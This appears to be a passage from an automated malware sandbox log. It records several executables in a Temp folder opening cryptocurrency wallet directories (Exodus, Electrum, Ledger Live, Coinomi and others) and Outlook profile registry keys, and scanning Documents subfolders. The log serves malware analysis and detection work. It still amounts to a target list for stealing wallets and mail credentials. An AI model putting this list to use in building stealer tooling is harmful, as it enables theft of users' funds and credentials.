                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
